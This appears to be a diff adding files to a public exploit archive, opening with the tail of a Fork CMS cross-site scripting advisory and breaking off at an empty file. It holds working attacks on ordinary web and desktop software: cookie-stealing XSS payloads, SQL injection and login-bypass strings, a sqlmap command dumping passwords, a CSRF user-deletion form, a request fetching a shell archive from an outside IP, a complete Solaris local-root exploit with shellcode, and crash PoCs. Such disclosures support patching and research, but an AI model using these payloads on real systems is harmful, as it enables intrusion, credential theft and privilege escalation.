https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-2
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
-
POST: HTTP/1.1 200 OK
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Content-Length: 3585
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55 GMT;
Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Vary: Accept-Encoding
Content-Encoding: gzip
X-server: fork01
Reference(s):
https://fork-cms.localhost:8080/en/modules/profiles/register
https://fork-cms.localhost:8080/private/en/profiles/index
https://fork-cms.localhost:8080/private/en/users/index
https://fork-cms.localhost:8080/private/en/users/edit
https://fork-cms.localhost:8080/private/en/users/add
Security Risk:
==============
The security risk of the persistent input validation web vulnerabilities
in the fork cms web-application is estimated as high.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

32
exploits/php/webapps/48354.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Unauthorized user that has access private message can embed Javascript
# code to admin panel.
# Steps to reproduce:
1- Log in to member panel.
1- Change user-agent header as <script>alert(1)</script>
2- Send the private message to admin user.
3- When admin user logs in to Backend System Dashboard, an alert box pops
up on screen.
PoC Request:
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: <script>alert(1)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send

43
exploits/php/webapps/48356.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: PMB 5.6 - 'logid' SQL Injection
# Google Dork: inurl:opac_css
# Date: 2020-04-20
# Exploit Author: 41-trk (Tarik Bakir)
# Vendor Homepage: http://www.sigb.net
# Software Link: http://forge.sigb.net/redmine/projects/pmb/files
# Affected versions : <= 5.6
-==== Software Description ====-
PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products.
We are some librarians, users and developers deploring this state of affairs.
PMB is based on web technology. This is what we sometimes call a 'web-app'.
PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language.
The main functions of PMB are :
* Supporting the UNIMARC format
* Authorities management (authors, publishers, series, subjects...)
* Management of loans, holds, borrowers...
* A user-friendly configuration
* The ability to import full bibliographic records
* A user-friendly OPAC integrating a browser
* Loans management with a module designed to serve even the very small establishments
* Serials management
* Simple administration procedures that can be handled easily even by the library staff...
-==== Vulnerability ====-
Variable $logid isn't properly sanitized in file /admin/sauvegarde/download.php, which allows ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter.
-==== POC ====-
http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI]
Using SQLMAP :
./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords
-==== Exploit requirements ====-
- You will need to be logged in in order to exploit the vulnerability.

27
exploits/php/webapps/48357.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://sourceforge.net/projects/cszcms/
# Version: v1.2.7
# Description:
# Authenticated user can inject hyperlink to Backend System Dashboard and
# Member Dashboard via message.
PoC Request:
POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/CSZCMS-V1.2.7/member/newpm
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Cookie: cszcookie
Connection: close
Upgrade-Insecure-Requests: 1
csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=<h1><b><a href="http://changeme/">Please
click to view</a></b></h1>&message=phishing&submit=Send

46
exploits/php/webapps/48361.txt Normal file
View file

@ -0,0 +1,46 @@
# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download
# Google Dork: jizhicms
# Date: 2020-04-18
# Exploit Author: iej1ctk1g
# Vendor Homepage: https://www.jizhicms.cn/
# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip
# Version: 1.6.7
# Tested on Mac OS
# CVE : N/A
Data 1.
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 86
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close
action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip
Data 2.
POST /admin.php/Plugins/update.html HTTP/1.1
Host: 192.168.1.253:8888
Content-Length: 32
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.253:8888
Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09
Connection: close
action=file-upzip&filepath=shell

50
exploits/php/webapps/48368.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: User Management System 2.0 - Persistent Cross-Site Scripting
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: v2.0
# Tested on: Xampp
# Credit: İsmail BOZKURT
------ Details:
1- Vulnerable code is here:
Insert user registration information to the DB without filtering.
if(isset($_POST['signup']))
{
$fname=$_POST['fname'];
$lname=$_POST['lname'];
$email=$_POST['email'];
$password=$_POST['password'];
$contact=$_POST['contact'];
$enc_password=$password;
$msg=mysqli_query($con,"insert into
users(fname,lname,email,password,contactno)
values('$fname','$lname','$email','$enc_password','$contact')");
if($msg)
{
echo "<script>alert('Register successfully');</script>";
}
}
2- In the admin dashboard:
Get fullName from DB and print it without any filtering
<?php $ret=mysqli_query($con,"select * from users");
$cnt=1;
while($row=mysqli_fetch_array($ret))
{?>
<tr>
<td><?php echo $cnt;?></td>
<td><?php echo $row['fname'];?></td>
<td><?php echo $row['lname'];?></td>
<td><?php echo $row['email'];?></td>
<td><?php echo $row['contactno'];?></td> <td><?php echo
$row['posting_date'];?></td>
</tr>
4- If we insert value of the "fname" as "script>prompt(1)</script>", we can
perform this attack as "Stored XSS"

49
exploits/php/webapps/48369.txt Normal file
View file

@ -0,0 +1,49 @@
# Exploit Title: User Management System 2.0 - Authentication Bypass
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/
# Version: v2.0
# Tested on: Xampp
# Credit: İsmail BOZKURT
------ Details:
1- Vulnerable code is here (admin login: /admin/index.php):
<?php
session_start();
include("dbconnection.php");
if(isset($_POST['login']))
{
$adminusername=$_POST['username'];
$pass=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE
username='$adminusername' and password='$pass'");
$num=mysqli_fetch_array($ret);
if($num>0)
{
$extra="manage-users.php";
$_SESSION['login']=$_POST['username'];
$_SESSION['id']=$num['id'];
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
else
{
$_SESSION['action1']="*Invalid username or password";
$extra="index.php";
echo "<script>window.location.href='".$extra."'</script>";
exit();
}
}
2- We can bypass authentication with SQLi:
Bypass code (user and admin login panel):
Username: pentester' or'1'=1#
Password : pentester' or'1'=1#
Finally: There is a lot of SQLi input in this project. Like, login,
registration, forgot password ...

42
exploits/php/webapps/48370.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Complaint Management System 4.2 - Persistent Cross-Site Scripting
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
------ Details:
1- Vulnerable code is here: http://localhost/cms/users/registration.php
2- Vulnerable code:
Insert user registration information to the DB without filtering.
if(isset($_POST['submit']))
{
$fullname=$_POST['fullname'];
$email=$_POST['email'];
$password=md5($_POST['password']);
$contactno=$_POST['contactno'];
$status=1;
$query=mysqli_query($con,"insert into
users(fullName,userEmail,password,contactNo,status)
values('$fullname','$email','$password','$contactno','$status')");
$msg="Registration successfull. Now You can login !";
}
?>
3- In the admin dashboard:
Get fullName from DB and print it without any filtering
<tr>
<td colspan="2"><b><?php echo $row['fullName'];?>'s profile</b></td>
</tr>
4- If we insert "fullName" as "script>prompt(2)</script>", we can perform
this attack as "Stored XSS"
5- Picture in the Attachemnt
---------------------------------------------------

40
exploits/php/webapps/48371.txt Normal file
View file

@ -0,0 +1,40 @@
# Exploit Title: Complaint Management System 4.2 - Authentication Bypass
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
------ Details:
1- Vulnerable code is here:
if(isset($_POST['submit']))
{
$username=$_POST['username'];
$password=md5($_POST['password']);
$ret=mysqli_query($con,"SELECT * FROM admin WHERE
username='$username' and password='$password'");
$num=mysqli_fetch_array($ret);
if($num>0)
{
$extra="change-password.php";//
$_SESSION['alogin']=$_POST['username'];
$_SESSION['id']=$num['id'];
$host=$_SERVER['HTTP_HOST'];
$uri=rtrim(dirname($_SERVER['PHP_SELF']),'/\\');
header("location:http://$host$uri/$extra");
exit();
}
2- We can bypass authentication with SQLi:
Bypass code (admin login panel):
Username: pentester' or'1'=1#
Password : pentester' or'1'=1#
Finally: There is a lot of SQLi input in this project. Like, login,
registration, forgot password ...
-----------------------------------

29
exploits/php/webapps/48372.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User)
# Author: Besim ALTINOK
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/complaint-management-sytem/
# Version: v4.2
# Tested on: Xampp
# Credit: İsmail BOZKURT
*************************************************
Detail:
You can perform CSRF Attack for all the functions.
----------------------------------------------
CSRF PoC for Delete User
----------------------------------------------
This request performs over the GET request with uid.
------------------------------------------------------------------------
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost/cms/admin/manage-users.php">
<input type="hidden" name="uid" value="4" />
<input type="hidden" name="" value="" />
<input type="hidden" name="action" value="del" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

320
exploits/solaris/local/48359.c Normal file
View file

@ -0,0 +1,320 @@
# Title: Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation
# Date: 2020-04-21
# Author: Marco Ivaldi
# Vendor: www.oracle.com
# CVE: CVE-2020-2944
/*
* raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel
* Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* A buffer overflow in the _SanityCheck() function in the Common Desktop
* Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and
* earlier allows local users to gain root privileges via a long calendar name
* or calendar owner passed to sdtcm_convert in a malicious calendar file
* (CVE-2020-2944).
*
* The open source version of CDE (based on the CDE 2.x codebase) is not
* affected, because it does not ship the vulnerable binary.
*
* "CDE, the gift that keeps on giving" -- @0xdea
* "Feels more like a curse you can't break from this side." -- @alanc
*
* This exploit uses the ret-into-ld.so technique to bypass the non-exec stack
* protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory
* space, try returning to sprintf() instead of strcpy().
*
* I haven't written a Solaris/SPARC version because I don't have a SPARC box
* on which Solaris 10 can run. If anybody is kind enough to give me access to
* such a box, I'd be happy to port my exploit to Solaris/SPARC as well.
*
* Usage:
* $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall
* $ ./raptor_sdtcm_conv
* [...]
* Do you want to correct it? (Y/N) [Y] n
* # id
* uid=0(root) gid=1(other) egid=12(daemon)
* #
*
* This should work with any common configuration on the first try. To
* re-enable rpc.cmsd, clear its service maintenance status by running the
* following commands as root:
* # /usr/sbin/svcadm clear cde-calendar-manager
* # /usr/bin/svcs -a | grep calendar
* online 13:16:54 svc:/network/rpc/cde-calendar-manager:default
*
* Tested on:
* SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
* [previous Solaris versions are also likely vulnerable]
*/
#include <fcntl.h>
#include <link.h>
#include <procfs.h>
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/systeminfo.h>
#include <sys/types.h>
#define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel"
#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi <raptor@0xdeadbeef.info>"
#define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program
#define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility
#define BUFSIZE 2304 // size of the name/owner
#define PAYSIZE 1024 // size of the payload
#define OFFSET env_len / 2 // offset to the shellcode
char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
/* double setuid() */
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
/* execve() */
"\x31\xc0\x50\x68/ksh\x68/bin"
"\x89\xe3\x50\x53\x89\xe2\x50"
"\x52\x53\xb0\x3b\x50\xcd\x91";
/* globals */
char *env[256];
int env_pos = 0, env_len = 0;
/* prototypes */
int add_env(char *string);
void check_zero(int addr, char *pattern);
int search_ldso(char *sym);
int search_rwx_mem(void);
void set_val(char *buf, int pos, int val);
/*
* main()
*/
int main(int argc, char **argv)
{
char buf[BUFSIZE], payload[PAYSIZE];
char platform[256], release[256], hostname[256];
int i, payaddr;
char *arg[3] = {"foo", "hax0r", NULL};
int sb = ((int)argv[0] | 0xfff); /* stack base */
int ret = search_ldso("strcpy"); /* or sprintf */
int rwx_mem = search_rwx_mem(); /* rwx memory */
char cmd[1024];
FILE *fp;
/* print exploit information */
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
/* read command line */
if (argc != 1) {
fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]);
fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n");
exit(1);
}
/* get system information */
sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
sysinfo(SI_RELEASE, release, sizeof(release) - 1);
sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1);
/* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */
memset(payload, '\x90', PAYSIZE);
payload[PAYSIZE - 1] = 0x0;
memcpy(&payload[PAYSIZE - sizeof(sc)], sc, sizeof(sc));
/* fill the envp, keeping padding */
add_env(payload);
add_env("HOME=/tmp");
add_env(NULL);
/* calculate the payload address */
payaddr = sb - OFFSET;
/* prepare the evil palette name */
memset(buf, 'A', sizeof(buf));
buf[sizeof(buf) - 1] = 0x0;
/* fill with function address in ld.so.1, saved eip, and arguments */
for (i = 0; i < BUFSIZE - 16; i += 4) {
set_val(buf, i, ret); /* strcpy */
set_val(buf, i += 4, rwx_mem); /* saved eip */
set_val(buf, i += 4, rwx_mem); /* 1st argument */
set_val(buf, i += 4, payaddr); /* 2nd argument */
}
/* print some output */
fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
fprintf(stderr, "Using SI_HOSTNAME\t: %s\n", hostname);
fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
fprintf(stderr, "Using payload address\t: 0x%p\n", (void *)payaddr);
fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
/* create the evil calendar file */
fprintf(stderr, "Preparing the evil calendar file... ");
snprintf(cmd, sizeof(cmd), "%s -a -c hax0r@%s", ADMIN, hostname);
if (system(cmd) == -1) {
perror("Error creating calendar file");
exit(1);
}
if (chmod("/usr/spool/calendar/callog.hax0r", 0660) == -1) {
perror("Error creating calendar file");
exit(1);
}
/* prepare the evil calendar file (badchars currently not handled) */
fp = fopen("/usr/spool/calendar/callog.hax0r", "w");
if (!fp) {
perror("Error preparing calendar file");
exit(1);
}
fprintf(fp, "Version: 4\n(calendarattributes "
"(\"-//XAPIA/CSA/CALATTR//NONSGML Access List//EN\","
"\"10:access_list\",\"world:2\")\n");
/* buffer overflow in calendar name */
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
"\"5:string\",\"%s\")\n", buf);
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
"\"6:user\",\"fnord\")\n)");
/* buffer overflow in calendar owner */
/*
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Name//EN\","
"\"5:string\",\"hax0r\")\n");
fprintf(fp, "(\"-//XAPIA/CSA/CALATTR//NONSGML Calendar Owner//EN\","
"\"6:user\",\"%s\")\n)", buf);
*/
fclose(fp);
fprintf(stderr, "Done.\n");
/* run the vulnerable program */
fprintf(stderr, "Exploiting... Please answer \"n\" when prompted.\n");
execve(VULN, arg, env);
perror("execve");
exit(0);
}
/*
* add_env(): add a variable to envp and pad if needed
*/
int add_env(char *string)
{
int i;
/* null termination */
if (!string) {
env[env_pos] = NULL;
return env_len;
}
/* add the variable to envp */
env[env_pos] = string;
env_len += strlen(string) + 1;
env_pos++;
/* pad the envp using zeroes */
if ((strlen(string) + 1) % 4)
for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
env[env_pos] = string + strlen(string);
env_len++;
}
return env_len;
}
/*
* check_zero(): check an address for the presence of a 0x00
*/
void check_zero(int addr, char *pattern)
{
if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
!(addr & 0xff000000)) {
fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
exit(1);
}
}
/*
* search_ldso(): search for a symbol inside ld.so.1
*/
int search_ldso(char *sym)
{
int addr;
void *handle;
Link_map *lm;
/* open the executable object file */
if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
perror("dlopen");
exit(1);
}
/* get dynamic load information */
if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
perror("dlinfo");
exit(1);
}
/* search for the address of the symbol */
if ((addr = (int)dlsym(handle, sym)) == NULL) {
fprintf(stderr, "Sorry, function %s() not found\n", sym);
exit(1);
}
/* close the executable object file */
dlclose(handle);
check_zero(addr - 4, sym);
return addr;
}
/*
* search_rwx_mem(): search for an RWX memory segment valid for all
* programs (typically, /usr/lib/ld.so.1) using the proc filesystem
*/
int search_rwx_mem(void)
{
int fd;
char tmp[16];
prmap_t map;
int addr = 0, addr_old;
/* open the proc filesystem */
sprintf(tmp,"/proc/%d/map", (int)getpid());
if ((fd = open(tmp, O_RDONLY)) < 0) {
fprintf(stderr, "Can't open %s\n", tmp);
exit(1);
}
/* search for the last RWX memory segment before stack (last - 1) */
while (read(fd, &map, sizeof(map)))
if (map.pr_vaddr)
if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
addr_old = addr;
addr = map.pr_vaddr;
}
close(fd);
/* add 4 to the exact address NULL bytes */
if (!(addr_old & 0xff))
addr_old |= 0x04;
if (!(addr_old & 0xff00))
addr_old |= 0x0400;
return addr_old;
}
/*
* set_val(): copy a dword inside a buffer (little endian)
*/
void set_val(char *buf, int pos, int val)
{
buf[pos] = (val & 0x000000ff);
buf[pos + 1] = (val & 0x0000ff00) >> 8;
buf[pos + 2] = (val & 0x00ff0000) >> 16;
buf[pos + 3] = (val & 0xff000000) >> 24;
}

35
exploits/windows/dos/48284.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
# Discovery by: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Tested Version: 4.2.2.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3
# About App
# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers.
# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Key'
# 6.click 'ok'
# 5.Magic happen :)
#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500
try:
f=open("POC.txt","w")
print "[+] Creating %s bytes payload.." %len(buff)
f.write(buff)
f.close()
print "[+] POC created!"
except:
print "POC cannot be created"

36
exploits/windows/dos/48285.py Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
# Exploit Author: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: https://www.spotauditor.com/
# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe
# Tested Version: 5.3.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3
# About App
# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords,
# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook
# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20
# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms.
# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run SpotAuditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Name'
# 6.click 'ok'
# 5.Magic happen :)
#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500
try:
f=open("POC.txt","w")
print "[+] Creating %s bytes payload.." %len(buff)
f.write(buff)
f.close()
print "[+] POC created!"
except:
print "POC cannot be created"

39
exploits/windows/dos/48286.py Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
# Discovery by: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.2.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3
# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
# software significantly reduces the total cost of network management in enterprise environments by enabling
# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
# installing server-side applications on these computers and create a report of potential problems that were found.
# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Name'
# 6.click 'ok'
# 5.Magic happen :)
#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500
try:
f=open("POC.txt","w")
print "[+] Creating %s bytes payload.." %len(buff)
f.write(buff)
f.close()
print "[+] POC created!"
except:
print "POC cannot be created"

26
exploits/windows/dos/48287.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: Frigate 3.36 - Denial of Service (PoC)
# Date: 2020-04-05
# Exploit Author: inter
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
# Vulnerable Software: Firgate
# Version: 3.36
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English)
#Steps to Produce the Crash:
# 1.- Run python code: crash.py
# 2.- Copy content to clipboard
# 3.- Open "Frigate3.exe"
# 4.- Go to "Disk" > Find Computer
# 5.- Paste ClipBoard into the "Computer Name:" field
# 6.- Click on OK
# 7.- Crashed
#Python "crash.py" Code:
buffer = "\x41" * 2000
f = open ("Frigate.txt", "w")
f.write(buffer)
f.close()

23
exploits/windows/dos/48288.py Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
#3.- Open UltraVNC Launcher
#4.- Select "Properties"
#5.- In "Repeater host" Paste Clipboard
#6.- Click on "OK"
#7.- Crashed
cod = "\x41" * 300
f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
f.write(cod)
f.close()

24
exploits/windows/dos/48290.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py
#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard
#3.- Open UltraVNC Launcher
#4.- Select "Properties"
#5.- In "Password" Paste Clipboard
#6.- Click on "OK"
#7.- Click on "Propieties"
#8.- Crashed
cod = "\x41" * 300
f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w')
f.write(cod)
f.close()

22
exploits/windows/dos/48291.py Executable file
View file

@ -0,0 +1,22 @@
